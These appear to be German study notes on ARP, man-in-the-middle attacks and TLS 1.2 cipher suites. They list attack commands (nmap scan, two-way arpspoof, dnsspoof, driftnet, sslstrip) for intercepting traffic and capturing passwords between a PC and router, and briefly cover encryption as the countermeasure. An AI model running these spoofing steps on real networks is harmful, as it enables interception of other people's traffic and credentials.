ARP address
===========

Arp adress resolution protocol (wird nur im localen Netz verwendet)

interne IP adressen auf mac addressen

broadcastet wer welche IP hat?
unverschlüsselt
Arp nachrichten kann jeder schicken
dient dazu mac adressen zu IP adressen zuzuordnen und diese Zuordnung in einer Tabelle zu speichern

Angriffe basierend auf arp sind nur im lokalen Netz möglich


Ziel Man in the middle zwischen PC und router
Man muss dem PC vorgaukeln der Router zu sein und dem Router, dass man die zei



.. code-block:: Python

  arp -a -s # show arp cache

  nmap -sP # Ping scan to find target ip

  arpspoof -i eth0 -t router target
  arpspoof -i eth0 -t target router

  #at the end cleaning up and rearping

  cat /proc/sys/net/ipv4/ip_porward


schickt periodisch

driftnet - zeigt bilder

dnsspoof -i eth0 -f

fangen dns anfragen ab und leiten die antworten um

man in the middle mit verschlüsselung
-------------------------------------

ip tabeles //

sslstrip -s -l 8000 // schnappt sich sämtlichen tls content in der Website und schickt die Seite weiter zum client

damit sehen wir nach antwort des clients mit passwort Eingabe die Daten in plaintext arp dem man in the middle

finktioniert nur wenn ssl elemente in http content drin sind nicht bei reinem Https


kann auch den ssl tunnel faken. man tut beim client so als wäre man der server und verbindet sich direkt mit ihm über einen SSH tunnel
dann verbindet ma sich


Was kann man gegen Man in the middle tun?
-----------------------------------------

verschlüsseln

TLS 1.2
-------

verschlüsselte Kommunikation

tauschen schlüssel über rsa verschlüsselt aus

TLS_RSA_WITH_AES_128_CBC_SHA,

RSA -> key exchange

AES_128_CBC -> bulk encryption

SHA-> Hashverfahren, dass für Message authentication code (MAC) und PRF verwendet wird

TLS_DHE_RSA_WITH_AES_256_GCM_SHA384

DIffihellman Problem, kann nicht autentifizieren, wer mit mir den schlüssel aushandelt, daher nutzt man RSA um die DHE Paramenter zu segnieren
